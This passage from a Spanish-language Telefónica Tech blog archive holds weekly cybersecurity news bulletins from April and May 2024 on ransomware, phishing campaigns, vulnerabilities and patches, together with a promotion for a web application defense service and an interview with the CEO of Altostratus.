Sharing and Analysis Center), se ha publicado un análisis del ransomware Black Basta. Enmarcada en los advisories #StopRansomware, la investigación revela que Black Basta es un Ransomware-as-a-Service (RaaS) que llevaría activo desde 2022, habiendo atacado a más de 500 entidades a lo largo de su historia hasta mayo de 2024. Black Basta obtendría el acceso inicial a los sistemas de las víctimas mayoritariamente mediante spearphishing, aunque también habría empleado el malware Qakbot, credenciales válidas y la explotación de vulnerabilidades de ConnectWise. Posteriormente, los operadores del ransomware llevan a cabo escaneos de red, movimientos laterales y escaladas de privilegios, evitando ser detectados por soluciones de seguridad, para finalmente exfiltrar y cifrar los datos. Black Basta se caracteriza por llevar a cabo un modelo de doble extorsión, amenazando con publicar los datos exfiltrados en su sitio web de Tor si la empresa afectada no paga el rescate solicitado. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a Vulnerabilidad en productos de Apple Apple ha emitido actualizaciones de seguridad para varios de sus productos entre las cuales destaca una vulnerabilidad que se estima puede haber sido explotada activamente. En concreto, entre los fallos de seguridad destaca el registrado como CVE-2024-23296, CVSSv3 de 7.8, el cual fue parcheado el pasado mes de marzo, pero que se considera que puede haber sido aprovechado previamente a su actualización. Dicha vulnerabilidad sería una falla de corrupción de memoria en RTKit, el cual se trata de un sistema operativo integrado en la mayoría de los dispositivos de Apple y cuyo aprovechamiento podría permitir a un atacante con capacidad arbitraria de lectura y escritura del kernel eludir las protecciones de la memoria del mismo. Como se ha indicado previamente, Apple solucionó el error de corrupción de la memoria con una validación mejorada en las versiones de iOS 16.7.8 y iPadOS 16.7.8. https://www.securityweek.com/apple-patch-day-code-execution-flaws-in-iphones-ipads-macos/ Nueva campaña del malware Darkgate El equipo de investigación X-Labs de Forcepoint ha identificado una reciente campaña de Darkgate. Este malware se distribuye principalmente a través de correos electrónicos de phishing, utilizando archivos adjuntos comunes como XLSX, HTML y PDF. Darkgate está diseñado para ser sigiloso y persistente, lo que complica su detección y eliminación. Sus efectos pueden incluir la pérdida de datos personales, pérdidas financieras por fraude o extorsión, y la exposición de información sensible. La campaña detectada comienza con correos electrónicos de phishing que simulan ser facturas de QuickBooks, incitando a los usuarios a instalar Java. Al hacer clic en el enlace incrustado, los usuarios son dirigidos a una URL geolocalizada, donde sin saberlo descargan un archivo JAR malicioso. https://www.forcepoint.com/blog/x-labs/phishing-script-inside-darkgate-campaign ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
17 de mayo de 2024
Protege tus aplicaciones de los ataques automatizados
Las ciberamenazas automatizadas, como los bots y los ataques DDoS, se adaptan constantemente para eludir las medidas de seguridad, poner en peligro los servicios y degradar la experiencia de los clientes. Las organizaciones necesitan soluciones fiables que protejan sus aplicaciones y se adelanten a los cambios de los atacantes. Gracias a Web Application Defense (WAD), que forma parte de nuestra cartera de servicios gestionados NextDefense de Telefónica Tech, puedes proteger tus aplicaciones empresariales frente a amenazas persistentes, automatizadas y en constante evolución, sin añadir complejidad. Protección contra bots Aunque muchos bots son útiles, también pueden suponer una amenaza importante. Dado que los bots maliciosos representan el 30% de todo el tráfico de Internet, los actores de amenazas están aprovechando estas herramientas automatizadas para emular comportamientos similares a los humanos y mezclarse, eludiendo las defensas perimetrales tradicionales y reorganizándose rápidamente para evitar ser detectados. De hecho, los bots maliciosos son una de las principales fuentes de robo de credenciales, fraude en la creación de cuentas, scraping de contenidos y mucho más. Para protegerse contra estas amenazas, las empresas necesitan soluciones probadas que puedan distinguir rápidamente la actividad legítima de la maliciosa para bloquear los intentos de los atacantes. Las empresas necesitan soluciones probadas que distingan rápidamente la actividad legítima de la actividad maliciosa para bloquear los intentos de los atacantes. WAD proporciona protección eficaz contra bots tanto para aplicaciones modernas y heredadas como en local o en Cloud. Aplica modelos de IA avanzado para dispositivos y patrones de comportamiento y analiza grandes volúmenes de tráfico para identificar ataques de bots con la máxima eficacia y casi cero falsos positivos. Esto permite a las organizaciones permitir un acceso sin fricciones a las fuentes legítimas, al tiempo que detecta y detiene eficazmente los intentos nefastos. Las avanzadas tácticas de ofuscación también mantienen a las empresas un paso por delante, impidiendo la ingeniería inversa y la recopilación de información por parte de los atacantes. Protección DDoS Las empresas actuales dependen en gran medida de la disponibilidad y el rendimiento de sus aplicaciones y servicios. Pero ¿qué ocurre si estos servicios dejan de estar disponibles? Los ataques DDoS que pueden inutilizar los servicios están aumentando en volumen y cambiando de táctica al dirigirse a la capa de aplicaciones. La Agencia de Ciberseguridad de la Unión Europea (ENISA) los considera como una de las principales ciberamenazas para las empresas. Las empresas necesitan una solución de mitigación diseñada a la medida de los ataques DDoS modernos. Gracias a WAD, las organizaciones pueden proteger sus redes y aplicaciones frente a diversos ataques DDoS, como ataques volumétricos L3-L4, de capa de aplicación 7, SSL e intrusiones DNS. La inteligencia automática, la inteligencia sobre amenazas y la experiencia en aplicaciones permiten a nuestros expertos en seguridad de Telefónica Tech ofrecer protección las 24 horas del día para preservar la integridad de los activos digitales críticos, la infraestructura y el ancho de banda. ✅ Las defensas en tiempo real diferencian continuamente entre el tráfico legítimo y las solicitudes maliciosas para evitar el consumo de recursos críticos que degradan la disponibilidad y el rendimiento de las aplicaciones. Protección API Las interfaces de programación de aplicaciones (API) han desempeñado un papel fundamental en la modernización de las aplicaciones. Las empresas confían en las API para impulsar la conectividad y la innovación de sus servicios, pero a medida que crece su uso, se ha convertido en un foco de ataques automatizados. Los estudios demuestran que más del 90% de los ataques actuales basados en la Web se dirigen a los puntos finales de las API, y que los actores maliciosos emplean bots, DDoS y ataques de inyección para interrumpir las API y manipular su lógica. Con las API en el centro de casi todas las aplicaciones y servicios, las empresas deben adoptar amplias medidas de seguridad para proteger estas interfaces contra riesgos y usos indebidos. WAD elimina los puntos ciegos causados por las API no gestionadas. Con una gran visibilidad de las aplicaciones nuevas y heredadas, desde Telefónica Tech WAD identificamos rápidamente las API conocidas y desconocidas para proteger las interfaces ocultas o descentralizadas frente a las amenazas avanzadas. Las protecciones integradas detectan actividades inusuales, como intentos maliciosos o conexiones peligrosas, mientras que las defensas probadas evitan los ataques automatizados y humanos (incluidos los ataques de 0-day, bots, DDoS y los 10 principales riesgos de seguridad de API de OWASP). WAD también estandariza las configuraciones de seguridad a lo largo de todo el ciclo de vida de la API con una gobernanza centralizada para reducir el riesgo de las inversiones actuales y asegurar el desarrollo y la implantación en el futuro. ✅ Web Application Defense (WAD) de Telefónica Tech con tecnología F5 Distributed Cloud Services, es un servicio de seguridad gestionado para empresas de todos los tamaños y sectores. WAD, de fácil activación y escalabilidad instantánea, protege y gestiona aplicaciones y servicios críticos, sin consumir recursos internos. ○ Respaldado por nuestro equipo experto de Ciberseguridad de Telefónica Tech y nuestros 11 centros de operaciones de seguridad (SOC) globales, proporciona protección completa 24x7. ○ Reduce el riesgo, mitiga los ataques y aumenta la disponibilidad y el rendimiento de las aplicaciones. Más información → Cyber Security Pentesting y Security Assessment: dos caras de la misma moneda en Ciberseguridad 26 de octubre de 2023 Imagen de Rawpixel / Freepik.
14 de mayo de 2024
Boletín de Ciberseguridad, 4 - 10 mayo
Comprometido el sitio web del ransomware Lockbit e identificado y sancionado su líder Las autoridades judiciales nuevamente han comprometido el sitio web utilizado por los operadores de ransomware LockBit, modificando su contenido, prometiendo revelar información sobre los integrantes del grupo y estableciendo una nueva cuenta regresiva que finalizó el 7 de mayo. Sin embargo, investigadores de VX-underground contradijeron esta afirmación, aseverando que el grupo continuaba operando normalmente, añadiendo nuevas víctimas a su lista. Días más tarde, la Agencia Nacional del Crimen del Reino Unido identificaba y sancionaba al líder de LockBit, un ciudadano de origen ruso llamado Dmitry Yuryevich Khoroshev. Estados Unidos ha ofrecido una recompensa de 10 millones de dólares por su captura, y se ha compartido información detallada sobre él en redes sociales y otros medios. Más info Nuevo ataque TunnelVision filtra el tráfico de VPN Leviathan Security ha identificado un nuevo ataque denominado TunnelVision que puede dirigir el tráfico fuera del túnel de cifrado de una VPN, permitiendo a los atacantes espiar el tráfico no cifrado mientras mantienen la apariencia de una conexión VPN segura. Este método se basa en el abuso de la opción 121 del Protocolo de Configuración Dinámica de Host (DHCP), que posibilita la configuración de rutas estáticas sin clases. Los atacantes configuran un servidor DHCP fraudulento que altera las tablas de enrutamiento, desviando el tráfico de la VPN hacia la red local o hacia una puerta de enlace maliciosa, sin pasar por el túnel VPN cifrado. La raíz del problema reside en la ausencia de un mecanismo de autenticación de DHCP para los mensajes entrantes que podrían manipular las rutas, y se le ha asignado el identificador de vulnerabilidad CVE-2024-3661, CVSSv3 7.6 según CISA. Los investigadores han divulgado públicamente este problema junto con un exploit PoC para generar conciencia y presionar a los proveedores de VPN para que implementen medidas de protección. Más info Boletín de seguridad de Android mayo 2024 Google ha emitido el boletín de seguridad del sistema operativo Android correspondiente al mes de mayo de 2024. En esta ocasión, los parches de seguridad solucionan hasta 35 vulnerabilidades que afectan al sistema operativo, así como a múltiples componentes, que podrían provocar una escalada de privilegios o divulgación de información. Entre los fallos de seguridad destaca uno identificado como CVE-2024-23706, que fue considerado de gravedad crítica. Este se trata de una vulnerabilidad que lanza una excepción al intentar instanciar un token de registro de cambios sin tipos de registro, lo que podría dar lugar a una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. El boletín también aborda vulnerabilidades en los componentes Healthfitness, Media Framework y Permission Controller, así como fallos en el kernel en los componentes Arm, el hardware MediaTek y componentes de Qualcomm. Se recomienda a los usuarios actualizar los dispositivos a la última versión disponible para corregir todos los fallos indicados en el boletín. Más info Nuevo método de bypass del MFA en Azure Entra ID Los investigadores de Pen Test Partners (PTP) descubrieron durante un ejercicio de Red Team un nuevo método de bypass en Microsoft Azure Entra ID que les permitía obtener acceso a recursos protegidos sin necesidad de contraseñas. En concreto, PTP afirma haber conseguido sobrepasar la autenticación multifactor (MFA) del SSO de Azure cambiando el user-agent del navegador, ya que Azure no siempre requiere introducir la MFA en dispositivos Linux. Sin embargo, para poder completar el ataque los investigadores tenían que unir uno de sus equipos al dominio mediante un proxy o instalar una versión portable de Firefox en un dispositivo domain joined, que fue configurado para permitir el SSO en Windows. Finalmente, los investigadores inyectaron dos tickets TGS previamente obtenidos del on premise Active Directory, consiguiendo de esta manera acceder al portal de Azure y obtener los datos de la nube. Más info Zscaler descarta que se haya comprometido su entorno de producción Zscaler descartó que su entorno corporativo, de producción y de clientes se haya visto afectado por un acceso no autorizado de un actor de amenazas y subrayó que no había ningún impacto ni compromiso para sus clientes después de que un usuario de un foro de hacking anunciase la venta de un acceso a los sistemas de la compañía. Zscaler descubrió un entorno de prueba expuesto, que desconectó para realizar los pertinentes análisis forenses, y afirma que este estaba aislado sin conectividad con los entornos de producción y sin ningún dato de clientes. Asimismo, Zscaler ha destacado que continuarán con la actual investigación en curso, añadiendo que toman todas las amenazas potenciales seriamente. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
10 de mayo de 2024
Boletín de Ciberseguridad, 27 abril - 3 mayo
Ataques masivos de credential stuffing contra cuentas de Okta La compañía Okta ha emitido un aviso de seguridad en donde alerta sobre una campaña masiva de ataques de tipo credential stuffing que ha afectado a cuentas de usuario. En concreto, dicha campaña llevaría produciéndose desde mediados del pasado mes de marzo y habría conseguido comprometer un pequeño porcentaje de cuentas, sin especificar número. Cabe indicar que todas las solicitudes registradas en estos ataques llegaron a través de la red TOR y de varios servidores proxy como NSOCKS, Luminati y DataImpulse. Según Okta, los ataques observados fueron particularmente exitosos contra organizaciones que ejecutan Okta Classic Engine con ThreatInsight configurado en modo de solo auditoría en lugar de modo de registro y aplicación. Debido a estos hechos, la compañía ha emitido una serie de recomendaciones de seguridad para paliar estas campañas mediante la habilitación de ThreatInsight en modo Log and Enforce, denegar el acceso a servidores proxy anónimos o cambiar a Okta Identity Engine. Más info Palo Alto actualiza la solución para la vulnerabilidad CVE-2024-3400 en PAN-OS Palo Alto ha actualizado la solución publicada originalmente para la vulnerabilidad CVE-2024-3400 (CVSSv3 10.0 según fabricante) debido al creciente número de ataques exitosos registrados tras la publicación del parche, en especial tras la divulgación de diversas pruebas de concepto que lograban explotar con éxito el problema. Palo Alto recomienda tomar medidas basadas en la actividad sospechosa identificada previamente. Si ha habido actividad de sondeo o prueba, los usuarios deben actualizar a la última revisión de PAN-OS y proteger las configuraciones en ejecución, crear una clave maestra y elegir AES-256-GCM. Más info Más de 100 detenidos por la estafa del “hijo en apuros” en España La Guardia Civil ha publicado una nota de prensa en la que detalla la detención de más de 100 personas en varias provincias, acusadas de llevar a cabo la estafa telefónica del “hijo en apuros”. En este tipo de estafas, los atacantes estudian a las víctimas buscando potenciales familias que tengan un hijo emancipado, viviendo fuera o de viaje, con el objetivo de hacerse pasar por ellos y, aludiendo a que tienen un problema, manipulan a las víctimas para que les envíen dinero. La operación Hiwaso, que es como ha sido denominada, descubrió que los estafadores obtenían transferencias de entre 800 y 55 000 euros por cada víctima, llegando a defraudar al menos 850 000 euros solo en la provincia de Alicante. Más info HPE Aruba Networking corrige vulnerabilidades críticas La compañía HPE Aruba Networking ha emitido un aviso de seguridad que enumera un total de diez vulnerabilidades que afectan a múltiples versiones de ArubaOS, de las cuales cuatro son consideradas críticas. En concreto estos fallos de seguridad son los registrados como CVE-2024-26304, CVE-2024-26305, CVE-2024-33511 y CVE-2024-33512, todos ellos clasificados con un CVSSv3 de 9.8 según fabricante. Actores maliciosos podrían aprovechar estas vulnerabilidades y desencadenar condiciones de ejecución remota de código (RCE). En cuanto a su afectación, cabe indicar que todas las versiones de ArubaOS y SD-WAN con EoL, ArubaOS 10.5.1.0 y anteriores, 10.4.1.0 y anteriores, 8.11.2.1 y anteriores, y 8.10.0.10 y anteriores se encuentran afectadas. Asimismo, diferentes conductores de movilidad también se han visto afectados. En base a estos hechos Aruba recomienda habilitar la seguridad PAPI y actualizar los activos a las últimas versiones disponibles, también indica que, por el momento, no se ha identificado PoC ni explotación activa. Más info Incidente de Seguridad en Dropbox Sign Dropbox emitió un comunicado en el que informa acerca de que actores de amenaza comprometieron su plataforma Dropbox Sign eSignature, accediendo a tokens de autenticación, claves MFA y datos de clientes. El acceso no autorizado fue detectado el 24 de abril y la empresa rápidamente inició una investigación que reveló el compromiso de una herramienta de configuración del sistema, que permitió a los actores de amenazas ejecutar aplicaciones y servicios automatizados con privilegios elevados logrando así obtener acceso a la base de datos. Los datos expuestos incluyen correos electrónicos, nombres de usuario, números de teléfono y contraseñas, así como configuraciones y claves API. Aunque no se accedió a documentos o acuerdos de clientes, Dropbox reseteó contraseñas, cerró sesiones y restringió el uso de claves API. Asimismo, la compañía aconseja a los usuarios cambiar sus contraseñas y configuraciones MFA, y estar alertas ante posibles correos de phishing, advirtiendo que es fundamental realizar cualquier acción de recuperación de contraseña directamente en el sitio web de Dropbox Sign y hacer caso omiso a enlaces de correos electrónicos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
3 de mayo de 2024
Boletín de Ciberseguridad, 20 - 26 abril
Parcheada una vulnerabilidad crítica en Chrome El canal estable y el canal extendido de Chrome 124 fueron actualizados a la versión 124.0.6367.78/.79 para Mac y Windows, 124.0.6367.78 para Linux. Esta actualización de seguridad incluye la corrección de un total de 4 vulnerabilidades, entre las que destaca la CVE-2024-4058 (sin CVSSv3 aún, pero considerada crítica por el fabricante), un error de confusión de tipos en el motor de gráficos ANGLE que podría permitir a un atacante remoto la ejecución de código arbitrario. Google ha recompensado con el pago de 16 000 dólares a los investigadores que han descubierto la vulnerabilidad. Además, se han parcheado las vulnerabilidades, ambas sin CVSSv3 aún pero consideradas altas por el proveedor, CVE-2024-4059 y CVE-2024-4060. Más info Campaña maliciosa explotando 0-days en modelos de firewall El equipo de investigadores de Cisco publicó una investigación en la que señalan haber descubierto una campaña, denominada ArcaneDoor, dedicada a la explotación de dos vulnerabilidades 0-day que afectan a los firewalls Adaptive Security Appliance (ASA) y Firepower Threat Defense (FTD). Según los expertos, detrás de esta campaña estaría un actor amenaza estatal denominado UAT4356, también conocido como STORM-1849, que llevaría atacando desde noviembre de 2023 a redes gubernamentales en todo el mundo. Cisco no ha logrado identificar el vector de entrada, aunque ha lanzado parches para corregir dos 0-day registradas como CVE-2024-20353, CVSSv3 de 8.6 según fabricante, y CVE-2024-20359, CVSSv3 de 6.0 según fabricante, ya que han sido utilizadas por UAT4356 en su campaña. Cabe destacar que el aprovechamiento de estas vulnerabilidades podría permitir la condición de denegación de servicio, así como la ejecución de código local, lo que posibilitó la implementación de nuevos malware en las redes de sus víctimas. En base a estos hechos, Cisco recomienda aplicar los parches de seguridad. Más info Expuestas vulnerabilidades "MagicDot" en Windows En la conferencia Black Hat Asia de Singapur, un investigador de SafeBreach, Or Yair, publicó diferentes vulnerabilidades en la conversión de rutas de DOS a NT en Windows a las que se ha bautizado como MagicDot. Explotándolas, los atacantes esconden y manipulan archivos y procesos, ofreciendo capacidades similares a las de un rootkit sin necesidad de privilegios administrativos. Durante la conversión de las rutas, Windows elimina automáticamente los puntos y espacios adicionales, permitiendo crear rutas NT específicas para ocultar acciones maliciosas. Entre las vulnerabilidades identificadas, destaca, entre otros problemas que ya han sido en su mayoría parcheados por Microsoft, una de ejecución de código remoto (CVE-2023-36396, CVSSv3 7.8 según fabricante) que se activa al extraer un archivo comprimido. Se recomienda optar por las rutas NT sobre las DOS para mitigar estos riesgos y desarrollar técnicas para detectar manipulaciones sospechosas en las rutas de archivos, como puntos y espacios al final, dado que el problema subyacente de la autoeliminación de caracteres y la posibilidad de futuras explotaciones similares sigue existiendo. Más info Vulnerabilidad en Citrix uberAgent que permite una escalada de privilegios Cloud Software Group informó recientemente acerca de una vulnerabilidad crítica en su producto Citrix uberAgent, que puede provocar una escalada de privilegios del atacante. Identificada como CVE-2024-3902 y con una puntuación CVSSv3 de 7.3 según fabricante, afecta a todas las versiones anteriores a 7.1.2. La falla se debe a configuraciones inadecuadas que permiten manipular los privilegios del usuario. Además, requiere condiciones específicas para ser explotada, incluyendo ciertas métricas, configuraciones de WmiProvider y al menos una entrada [CitrixADC_Config] establecida. Para mitigar el riesgo, Citrix recomienda deshabilitar todas las métricas de CitrixADC eliminando ciertas propiedades del temporizador especificadas, eliminar todas las entradas [CitrixADC_Config] y, para las versiones 7.0 a 7.1.1, asegurarse de que WmiProvider no esté configurado o establecido en WMIC. Asimismo, la compañía insta encarecidamente a los usuarios a actualizar a la versión 7.1.2 lo antes posible. Más info MITRE fue atacado explotando dos vulnerabilidades en Ivanti MITRE Corporation ha compartido los primeros hallazgos de la investigación que está realizando para aclarar el ciberataque que sufrió en enero. La evidencia muestra que el acceso del actor de la amenaza a MITRE Nerve, el entorno de virtualización, investigación e experimentación, se realizó a través de la explotación encadenada de las vulnerabilidades CVE-2023-46805 (CVSSv3 8.2) y CVE-2024-21887 (CVSSv3 9.1) en productos Ivanti Connect Secure. MITRE afirma que el responsable del incidente fue un grupo respaldado por un gobierno extranjero sin detallar quién o qué país podría estar detrás del ataque. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
26 de abril de 2024
“El 85% de nuestro equipo es personal técnico certificado en constante formación”. Dani Aldea, Altostratus
Recientemente hemos recibido el premio Sales Partner of the Year de Google Cloud para la región de Iberia. Hablamos sobre esto y más con Dani Aldea, fundador y CEO de Altostratus, part of Telefónica Tech. * * * Tras más de dos años formando parte de Telefónica Tech, ¿cómo ha evolucionado Altostratus en el ecosistema tecnológico y cómo lo describirías en la actualidad? Desde nuestros inicios, en 2010, hemos estado acompañando a nuestros clientes en sus procesos de transformación digital y de migración a la nube. Empezamos centrados en la transformación del puesto de trabajo con Google Workspace. Luego, en 2014, fuimos una de las primeras empresas en la región en ofrecer servicios profesionales y productos de Google Cloud Platform. Lo que nos llevó a ser partners premier de Google Cloud en 2018. En 2021 pasamos a formar parte de Telefónica Tech y el año pasado superamos la auditoría para ser uno de los pocos partners MSP en España. Nuestro servicio integral abarca desde la consultoría hasta el soporte, pasando por la gestión del cambio, el desarrollo de aplicaciones y la formación. Actualmente en Altostratus más del 85% de nuestro equipo está compuesto por personal técnico certificado, que se mantiene en constante formación. Nos organizamos en áreas de colaboración y workplace, infraestructura, big data, desarrollo e IA & ML. Para nuestros clientes ofrecemos un servicio integral end-to-end que incluye consultoría detallada, gestión del cambio en procesos de transformación, desarrollo de aplicaciones personalizadas, formación para capacitar a los equipos de nuestros clientes y un centro de explotación para la monitorización y el soporte continuo. ¿Cuáles consideras que son los principales desafíos que enfrenta Altostratus en el panorama tecnológico actual? Uno de los principales desafíos que enfrenta Altostratus es mantenernos a la vanguardia de las constantes innovaciones y cambios en el mundo de la tecnología Cloud. La rápida evolución de las soluciones tecnológicas exige que estemos siempre actualizados y preparados para adaptarnos rápidamente a las nuevas tendencias y demandas del mercado. Creemos que es esencial diferenciarnos ofreciendo soluciones únicas y personalizadas que realmente agreguen valor a nuestros clientes. En este contexto, la integración y aprovechamiento de la IA se presenta como un desafío y oportunidad clave para mejorar y personalizar nuestras soluciones. No menos importante, el mantenimiento de la seguridad y la privacidad de los datos en un entorno cada vez más digitalizado sigue siendo una prioridad que nos exige estar siempre a la vanguardia. Daniel Aldea. CEO de Altostratus, parte de Telefónica Tech. Para diferenciarnos de la competencia, en Altostratus apostamos por ofrecer soluciones únicas y personalizadas que realmente agreguen valor a nuestros clientes. Por último, la formación de nuestros clientes. Creemos en el trabajo en equipo y es por ello por lo que trabajamos constantemente la capacitación de éstos, para que puedan participar de manera activa en el diseño de su infraestructura en la nube. ¿Cuáles dirías que son los hitos más relevantes que ha logrado Altostratus en los últimos dos años? En los últimos años, Altostratus ha logrado grandes avances en la industria. Recientemente, nos hemos convertido en Managed Service Provider de Google Cloud, luego de haber obtenido cuatro especializaciones en áreas clave como Infraestructura, Data Analytics, Cloud Migration y App development, todo ello en menos de un año. Este logro nos sitúa entre los pocos partners en España que han alcanzado tal reconocimiento, demostrando nuestro compromiso y alto nivel de especialización en el sector, y nos distingue por priorizar la seguridad, aplicar las mejores prácticas mediante la automatización y mantener un enfoque 'customer-first' Recientemente hemos anunciado que somos Partner Certificado de Amazon Web Services en España, estableciendo una división específica de trabajo dedicada exclusivamente a la línea de negocio de AWS. Por último, la semana pasada hemos recibido el premio Sales Partner of the Year de Google Cloud para la región de Iberia en los Google Cloud Partner Awards en Las Vegas. Un logro del cual estamos profundamente orgullosos. ¿Qué significa para Altostratus haber obtenido el reconocimiento Sales Partner of the Year de Google Cloud? Es una enorme confirmación de que vamos por el camino correcto luego de más de una década de esfuerzo y dedicación. Es sin duda también un gran reconocimiento para todo el equipo que hay detrás de Altostratus y Telefónica Tech, y que nos sitúa como uno de los partners más importantes de Google Cloud en España. Este reconocimiento es un reflejo de nuestro compromiso con la innovación y el desarrollo de soluciones que satisfagan las necesidades de nuestros clientes. Este premio no solo destaca nuestros excelentes resultados en ventas, sino también la confianza y las relaciones a largo plazo que hemos construido con nuestros clientes en Iberia. Además, es un claro reflejo de nuestra fuerte alianza con Google Cloud y nuestro compromiso en innovar y fortalecer nuestra presencia en el mercado. ¿Cuáles son los próximos grandes objetivos y qué planes tenéis para seguir creciendo? Nuestros próximos grandes objetivos son continuar expandiendo nuestra presencia y fortalecer aún más nuestras alianzas estratégicas con líderes tecnológicos como Google Cloud y AWS. Estamos enfocados en seguir innovando y desarrollando soluciones avanzadas de nube que satisfagan las necesidades de nuestros clientes. Además, estamos explorando nuevas oportunidades de negocio para seguir creciendo y ofrecer un valor añadido a nuestros clientes. Estamos muy comprometidos con mantener el ritmo de la evolución tecnológica y asegurar que Altostratus, como parte de Telefónica Tech, siga siendo un referente en soluciones de nube en el mercado español.
25 de abril de 2024
Boletín de Ciberseguridad, 13 - 19 abril
El grupo de ciberespionaje Earth Hundun desarrolla un nuevo malware El actor malicioso Earth Hundun ha desarrollado una nueva versión del malware Waterbear que ha sido denominada Deuterbear. De acuerdo con un análisis publicado por Trend Micro, el grupo de ciberespionaje Earth Hundun llevaría actualizando el backdoor Waterbear desde 2009 y lo habría empleado en ataques contra entidades de los sectores tecnológico y gubernamental de Asia-Pacífico. Waterbear tiene la capacidad de usar técnicas para evitar ser detectado por soluciones de seguridad, así como de descarga y despliegue de un Remote Access Trojan (RAT). Por otro lado, Deuterbear ha sido clasificado como una entidad diferente a Waterbear y no una variante de este, debido a las diferencias en la estructura de configuración y el flujo de descifrado. Asimismo, los investigadores destacan que Deuterbear cifra el tráfico de red mediante HTTPS y presenta actualizaciones en el malware, incluyendo la comprobación de sandboxes y la alteración del descifrado de funciones. https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html Oracle emite 441 parches para abordar múltiples vulnerabilidades en varios de sus productos Recientemente Oracle publicó su aviso de actualización de parches críticos del mes de abril. Contiene un total de 441 nuevos parches de seguridad, con el fin de abordar alrededor de 372 vulnerabilidades en varios de sus productos, de las cuales más de 200 podrían ser explotadas por atacantes remotos no autenticados. En el aviso hay más de 30 vulnerabilidades que fueron clasificadas como críticas con una puntuación CVSSv3 de 9.8 o superior según fabricante. Entre ellas se encuentran CVE-2024-21234, CVE-2024-21235 y CVE-2024-21236, que permiten la ejecución remota de código en diferentes componentes de Oracle. Asimismo, se emitieron parches para una significativa variedad de productos, incluyendo Oracle Communications, que recibió el mayor número de actualizaciones de seguridad, MySQL, Fusion Middleware y Java SE, entre otros. Por su parte, Oracle recomienda encarecidamente que se apliquen los parches de seguridad lo antes posible para evitar ataques exitosos, ya que algunos clientes han sido comprometidos debido a la falta de aplicación de estos. https://www.oracle.com/security-alerts/cpuapr2024.html Proveedor de Cisco Duo víctima de brecha de seguridad El equipo de seguridad de Cisco Duo, servicio dedicado a la autenticación multifactor, ha emitido un aviso de seguridad en el que alerta a sus usuarios sobre una brecha de seguridad en su proveedor de telefonía. En concreto, Cisco Duo dice que su proveedor, al cual no se identifica, dedicado a la gestión de mensajes de autenticación multifactor (MFA) SMS y VOIP de la empresa, se vio comprometido. El actor malicioso implicado habría obtenido las credenciales de empleados a través de un ataque de phishing y luego usó esas credenciales para obtener acceso a los sistemas del proveedor de telefonía, desencadenando en la descarga de registros de mensajes SMS y VoIP MFA asociados con cuentas Duo durante el mes de marzo. Entre los datos obtenidos en los registros exfiltrados aparecen números de teléfono, carriers, fechas, datos de localización y mensajes, entre otros. Desde Cisco señalan que siguen investigando con su proveedor el incidente y que, según este último, el actor malicioso no accedió a ningún contenido de los mensajes ni utilizó su acceso para enviar mensajes a los clientes. https://app.securitymsp.cisco.com/e/es?e=2785&eid=opguvrs&elq=bd1c1886a59e40c09915b029a74be94e 554 millones de cookies españolas ya están en la dark web Un estudio reciente realizado por NordVPN ha descubierto que más de 54 000 millones de cookies están en circulación en la dark web, con España encabezando la lista como el primer país europeo con 554 millones de cookies filtradas. Los investigadores examinaron un conjunto de datos de cookies y sus listados disponibles en la web oscura para determinar cómo fueron obtenidas y los riesgos de seguridad y privacidad que representan, así como el tipo de información que contienen. Los ciberdelincuentes lograrían adquirir esos millones de cookies principalmente a través de malware, como ladrones de información, troyanos y keyloggers. Cuando las cookies, que funcionan como claves digitales para sesiones en línea y datos personales, quedan expuestas, se convierten en un activo valioso para los ciberdelincuentes. Esta vulnerabilidad puede dar lugar al robo de información personal y financiera, así como al robo de identidad y transacciones no autorizadas. Dadas estas circunstancias, una medida inicial recomendable sería eliminar periódicamente las cookies del navegador. https://nordvpn.com/es/research-lab/stolen-cookies-study/ Fallo en Atlassian está siendo utilizado para desplegar el ransomware Cerber Los servidores Atlassian no parcheados están siendo explotados por actores de amenazas para desplegar una variante Linux del ransomware Cerber. Concretamente, estos ataques aprovechan la vulnerabilidad CVE-2023-22518 (CVSSv3 9.8) en Atlassian Confluence Data Center and Server, permitiendo a los atacantes restablecer Confluence y crear una cuenta de administrador. La campaña consiste en tres cargas útiles C++ altamente ofuscadas, compiladas como un formato ejecutable y enlazable de 64 bits y empaquetadas con UPX lo que hace difícil su detección. Una vez dentro del sistema, instalan el complemento web shell Effluence para ejecutar comandos arbitrarios y luego desencadenar el ransomware Cerber. Este último cifra archivos con la extensión .L0CK3D y deja una nota de rescate. Sin embargo, aunque se afirma en la nota que se filtrarán datos, esto no sucede. La firma de seguridad Cado Security, quienes observaron estos ataques, afirman que Cerber es una carga útil de ransomware relativamente sofisticada, aunque antigua. No obstante, el uso de la vulnerabilidad de Confluence le permite comprometer una gran cantidad de sistemas probablemente de alto valor. https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
19 de abril de 2024
Boletín de Ciberseguridad, 6 - 12 abril
